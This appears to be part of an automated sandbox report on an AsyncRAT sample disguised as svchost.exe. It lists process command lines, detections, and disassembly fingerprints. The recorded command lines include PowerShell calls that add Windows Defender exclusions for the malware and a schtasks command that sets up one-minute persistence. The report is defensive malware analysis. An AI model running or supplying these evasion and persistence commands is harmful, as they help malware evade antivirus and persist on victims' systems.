                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 92%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:4
                                                    Start time:14:10:38
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                    Imagebase:0x800000
                                                    File size:4'156'416 bytes
                                                    MD5 hash:C442A9B9299246B2E5683641A4341641
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:14:10:38
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                    Imagebase:0x8f0000
                                                    File size:69'632 bytes
                                                    MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:14:10:41
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:14:10:41
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:14:10:50
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:14:10:50
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:14:11:04
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:14:11:04
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:14:11:21
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:14:11:21
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:18
                                                    Start time:14:11:43
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                                                    Imagebase:0x7ff630e70000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:14:11:43
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:14:11:44
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Imagebase:0xa40000
                                                    File size:69'632 bytes
                                                    MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:23
                                                    Start time:14:11:53
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                    Imagebase:0xf20000
                                                    File size:69'632 bytes
                                                    MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:25
                                                    Start time:14:12:01
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                    Imagebase:0xeb0000
                                                    File size:69'632 bytes
                                                    MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:26
                                                    Start time:14:12:01
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Imagebase:0xef0000
                                                    File size:69'632 bytes
                                                    MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 585a052818dfcb5f10c9b5160823d5797aa2dd006a6390210332cd3a05dd46bd
                                                      • Instruction ID: bccc807c97b0536210c25c6ef71801d00a950eabed0ce09a0ae5587e3325d6f3
                                                      • Opcode Fuzzy Hash: 585a052818dfcb5f10c9b5160823d5797aa2dd006a6390210332cd3a05dd46bd
                                                      • Instruction Fuzzy Hash: 7021E971B1DA8C4FE786FB7888992B87BE1EF99301B0400BBE44DC3693DE149C058741
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 636e889ce01dbbc3784fadb94d0f922b3e70a047dbcc132bf2eb1c1c669df5df
                                                      • Instruction ID: 5c466b3b03cd952bd8c29790034110384d76cc26170276cd19984809239002f1
                                                      • Opcode Fuzzy Hash: 636e889ce01dbbc3784fadb94d0f922b3e70a047dbcc132bf2eb1c1c669df5df
                                                      • Instruction Fuzzy Hash: 94713070A189198FEB55FF78C598BAD7BE2FF58314F2401A9E01AD31D1CF3498428B40
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d466adf621421d70d2cc1800c7f8081566d91ab3bd6b1aa3cc01e39fcad8ac04
                                                      • Instruction ID: 93b597d358d9c966e9984b93271ce554afc102a47c172b7fca67c8b83e4c9087
                                                      • Opcode Fuzzy Hash: d466adf621421d70d2cc1800c7f8081566d91ab3bd6b1aa3cc01e39fcad8ac04
                                                      • Instruction Fuzzy Hash: 0E21DC71B0990C5FEB84FA68C8996B9B7E2EF98301B04007AE80EC3693DE24AC058745
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cbe3906b51adda66c8000a10c4a25285cc6efc4c9174cff59cb3a1aa681dff87
                                                      • Instruction ID: 5a0cc8b7edf22f27d1e828665513d10ab46068b88730d68d74edb23229a4df48
                                                      • Opcode Fuzzy Hash: cbe3906b51adda66c8000a10c4a25285cc6efc4c9174cff59cb3a1aa681dff87
                                                      • Instruction Fuzzy Hash: C21120B0D087499FEB04EF68C4496EEBFF0EF48310F1441AAD040E7282DB38A9428B51
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 83bd946c56215da4d2d94a80744e198af92b25133c29a018efeaece8dc205a55
                                                      • Instruction ID: 9a178b58887d5ae2eb857f32eabb34bf9324e025f2e5b24a2184489570282f2b
                                                      • Opcode Fuzzy Hash: 83bd946c56215da4d2d94a80744e198af92b25133c29a018efeaece8dc205a55
                                                      • Instruction Fuzzy Hash: 0F012670B1DA994BE745FF38D4916B937D1EF8C310B5404BAD949C3382DE28E8428785
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e34a470af8ee00b9f19752aa4d7b34e4c09ac148a6542f7d65215cfc6f655c56
                                                      • Instruction ID: a97d24791777d0cdca2f4e22584f29055400a7d8c2952a6594df3cb8d3a45196
                                                      • Opcode Fuzzy Hash: e34a470af8ee00b9f19752aa4d7b34e4c09ac148a6542f7d65215cfc6f655c56
                                                      • Instruction Fuzzy Hash: 59F02870B1EA5A4BE755FA3CE441ABA73D5EF8C310B240579E94EC3281CD28E8424784
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c785050f2fe2fe918c7f5b45f07efa4436c0a776ea2a66be0dff5d8f275cce1a
                                                      • Instruction ID: 406b8153e642430f97ba78265867e5c4628cd204396b8171512215a1fc6a0d2b
                                                      • Opcode Fuzzy Hash: c785050f2fe2fe918c7f5b45f07efa4436c0a776ea2a66be0dff5d8f275cce1a
                                                      • Instruction Fuzzy Hash: 2AF0F43071DA594BE754FB3CD451A7E33D6EB8C300B600479E94EC3380DE28A8424785
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 409be2cf904390cac38eb40ca62efd346f8f76005d176bbaad7ed7b618dc41fd
                                                      • Instruction ID: aebb951cc369456ccc6726f018984eb498d1be14e60319370c1291660675d2c9
                                                      • Opcode Fuzzy Hash: 409be2cf904390cac38eb40ca62efd346f8f76005d176bbaad7ed7b618dc41fd
                                                      • Instruction Fuzzy Hash: D3E08691B5D9090BF79979BC64A72F86BC6DB88210F514179E00EC26C7EC09DC824285

                                                      Execution Graph

                                                      Execution Coverage:25.8%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:33.3%
                                                      Total number of Nodes:9
                                                      Total number of Limit Nodes:0

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 0dbc6b0834a6a77b16339ceac6b4f9e72b6ae17a0791763723d983891cd6ecf1
                                                      • Instruction ID: 737e44788d59dfbc05cb8b68bc930be28f2b8556ca4f034c3dcf9d08c4354139
                                                      • Opcode Fuzzy Hash: 0dbc6b0834a6a77b16339ceac6b4f9e72b6ae17a0791763723d983891cd6ecf1
                                                      • Instruction Fuzzy Hash: B4827FB4B1C90A8BEB99FF38C55667972D6FF98300F6045F9D40EC76C6DE28A8428741

                                                      Control-flow Graph

                                                      control_flow_graph 350 7ffb4ad37a81-7ffb4ad37b3d CheckRemoteDebuggerPresent 353 7ffb4ad37b3f 350->353 354 7ffb4ad37b45-7ffb4ad37b88 350->354 353->354
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID: CheckDebuggerPresentRemote
                                                      • String ID:
                                                      • API String ID: 3662101638-0
                                                      • Opcode ID: 5f28065202b093782de2986388e9142f543f71ab39178958734d98c36ea7eb80
                                                      • Instruction ID: 377c69178c57b1373f24846067739c88c358b397efc8669d6e5294835ea4c852
                                                      • Opcode Fuzzy Hash: 5f28065202b093782de2986388e9142f543f71ab39178958734d98c36ea7eb80
                                                      • Instruction Fuzzy Hash: 4131227190871C8FCB58DF58C88A7E97BE0FF65321F0542AAD489D7252CB34A856CB91

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2e7f17b3769e868dbb2fe5e17cb73ee7e95c3cafc0bdcad2a7029a79bd2aa13
                                                      • Instruction ID: 101ea861fc140fbf0c0a4e10f7cd0e4fc66eaa5db46b0995306f831a1d3d8b7f
                                                      • Opcode Fuzzy Hash: a2e7f17b3769e868dbb2fe5e17cb73ee7e95c3cafc0bdcad2a7029a79bd2aa13
                                                      • Instruction Fuzzy Hash: C432C2A1B2DA4A5BEB99FF38C45927977D6FF98300F5405F9E44EC3286CD28AC428741

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f0c88a054457e2cb7d88289a852f51a8711b37a55894c3c3388ec4c2c6e3baaa
                                                      • Instruction ID: 3657272fee50460df4c1fac65e2b31d70e9f4ca33ca44bceda58b3ad29870d17
                                                      • Opcode Fuzzy Hash: f0c88a054457e2cb7d88289a852f51a8711b37a55894c3c3388ec4c2c6e3baaa
                                                      • Instruction Fuzzy Hash: 7222C3A1B2DA4A5FEB95FF38C4692B977D6FF98300F5405F9E44DC3286CD28A8428741

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aeac5e413fb55ee8d4b5beb1daa4602b456229ab0d34a93c553e67102d920d86
                                                      • Instruction ID: bd7ed2ed0a6d29d6e5bde8ffded9393bd2a46f70d7b572b79956e6a7e9b3f5fe
                                                      • Opcode Fuzzy Hash: aeac5e413fb55ee8d4b5beb1daa4602b456229ab0d34a93c553e67102d920d86
                                                      • Instruction Fuzzy Hash: B5F1B470A0CA8D8FEBA9EF28CC557E977E1FF54310F1442AAE84DC7291DB3499458B81

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51a9e22682ba86d67a54d1683e8a4afed71582241ad62b56ee9f95bcccdc7006
                                                      • Instruction ID: bdb5363aea006a3a429f8244ce5157ed1f4cfd9a83fe8f0062058c8f329d6e5f
                                                      • Opcode Fuzzy Hash: 51a9e22682ba86d67a54d1683e8a4afed71582241ad62b56ee9f95bcccdc7006
                                                      • Instruction Fuzzy Hash: 61E1D3B060CA4D8FEBA8EF28C8557E937E1FF54310F1442AAE84DC7291DF7499458B81
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1e2a624e53a2c38387a3cded6cdda95f87e0449bc4ddff9998f8d7ddfd15a07a
                                                      • Instruction ID: 85854336fb20165207d2f87f6e016671a9d6e902ee71d56b74c38a29bb724efb
                                                      • Opcode Fuzzy Hash: 1e2a624e53a2c38387a3cded6cdda95f87e0449bc4ddff9998f8d7ddfd15a07a
                                                      • Instruction Fuzzy Hash: DA510E90B1E6C90FD387BF789865276BFE8DF97219B1801FAE089CA193DD085846C346

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID: CriticalProcess
                                                      • String ID: L_^
                                                      • API String ID: 2695349919-3397556586
                                                      • Opcode ID: bf6162497db00374440f0f71b90fdec8786772f2282781b630d5b7c7f619cd91
                                                      • Instruction ID: 73c8fe83f073ef6e7578a3275e84660c4eb125a554297318e726cf6f477e8ac8
                                                      • Opcode Fuzzy Hash: bf6162497db00374440f0f71b90fdec8786772f2282781b630d5b7c7f619cd91
                                                      • Instruction Fuzzy Hash: 2631227190CA488FDB18EF68C849BE9BBF4FF55311F14416ED08AD3682CB746846CB91

                                                      Control-flow Graph

                                                      control_flow_graph: basic blocks 329-339 covering 7ffb4ad39da8-7ffb4ad39ebd (block 334 at 7ffb4ad39e42-7ffb4ad39e7f calls SetWindowsHookExW); edge listing omitted
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID: HookWindows
                                                      • String ID:
                                                      • API String ID: 2559412058-0
                                                      • Opcode ID: d1c1b1c89be04b9a4d4ae7daf84da81d217fa2ef2e897c3a9af76f90f35f26fa
                                                      • Instruction ID: 484f0c9fabb1fe21b7e3b0fe9c8c9308fa90e3519ea924745c9273fd4d4b4fb6
                                                      • Opcode Fuzzy Hash: d1c1b1c89be04b9a4d4ae7daf84da81d217fa2ef2e897c3a9af76f90f35f26fa
                                                      • Instruction Fuzzy Hash: 26411570A0CA1C8FDB19EF6CD8066F9BBE1EF59320F10427ED049D3692CE65A852C781

                                                      Control-flow Graph

                                                      control_flow_graph: basic blocks 342-348 covering 7ffb4ad3988b-7ffb4ad3999d (block 342 at 7ffb4ad3988b-7ffb4ad39960 calls RtlSetProcessIsCritical); edge listing omitted
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID: CriticalProcess
                                                      • String ID:
                                                      • API String ID: 2695349919-0
                                                      • Opcode ID: dc25e606995746b3b6c1a5aa2921bcad40d554521a86c45667ffdeb8d6b51d1d
                                                      • Instruction ID: 22c7ee9b05b4abe4753897b6c88149a7375b003d617a8e93b0252b85b822d8e5
                                                      • Opcode Fuzzy Hash: dc25e606995746b3b6c1a5aa2921bcad40d554521a86c45667ffdeb8d6b51d1d
                                                      • Instruction Fuzzy Hash: 0941217090CB488FDB19EF68D8457EABBF0FF56310F0441AED08AD3692CB246846CB91
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b6d884f05479396e3d25304fda57afaafe5f6cdaac6206b40b7201956f8853a2
                                                      • Instruction ID: 0d1cdc27d99631e0a964b8e3885e7699af82701c6bfdb2b49fb31ac5fbfa1be7
                                                      • Opcode Fuzzy Hash: b6d884f05479396e3d25304fda57afaafe5f6cdaac6206b40b7201956f8853a2
                                                      • Instruction Fuzzy Hash: ACD1D87060CA8D8FEBA9EF28C8557E977E1FF58300F1442AEE84DC3291CB7499418B81
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 557445d459732e6abb0631a915d8f167fa05a9b82af837e0261bab324068bfb7
                                                      • Instruction ID: d4325d7269ebf60e45a17168be6980adbf786d5a8ae6bd2c3369414d8f09911f
                                                      • Opcode Fuzzy Hash: 557445d459732e6abb0631a915d8f167fa05a9b82af837e0261bab324068bfb7
                                                      • Instruction Fuzzy Hash: C051F467A0F27AE6D7127EBDF4514E97B18DF4237570882F7EA4D9D0878C04284686F1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1683317842.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffb4ad20000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6bd4978c4f5cfcfc03b78b5748bd9cdaefe1dec65d1ad7c4056a5488b77a70f2
                                                      • Instruction ID: 263383497c18146a0b066d416fec1e26101bbff7e5e3a55108e6923c7435c392
                                                      • Opcode Fuzzy Hash: 6bd4978c4f5cfcfc03b78b5748bd9cdaefe1dec65d1ad7c4056a5488b77a70f2
                                                      • Instruction Fuzzy Hash: D93167A284E3C25FD3436B709C764A17FB0DE5722070E44EBD4C4CB5A3D51C6A9AC762
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1683317842.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffb4ad20000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a1c9855a83b82cdd301a703d8296223d25d7b227c7a8da46c6ad5aa9027d362b
                                                      • Instruction ID: 1d770021333df160066cccadf8c6b80f931d34f86443d86804a7e482874b3ec5
                                                      • Opcode Fuzzy Hash: a1c9855a83b82cdd301a703d8296223d25d7b227c7a8da46c6ad5aa9027d362b
                                                      • Instruction Fuzzy Hash: 911132B1D04B485FEB04DF68C45A6DEBBF0EF58300F2041AAD040E7282CB349942CB52
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14087ddb125aa51965361be27c78d60a5c6d692011be9224224a3d44a6244872
                                                      • Instruction ID: 81dbcf3c4b00d2ab9bf782acb0cfa5e92daab76dae350db52a92e19ba8a9b36d
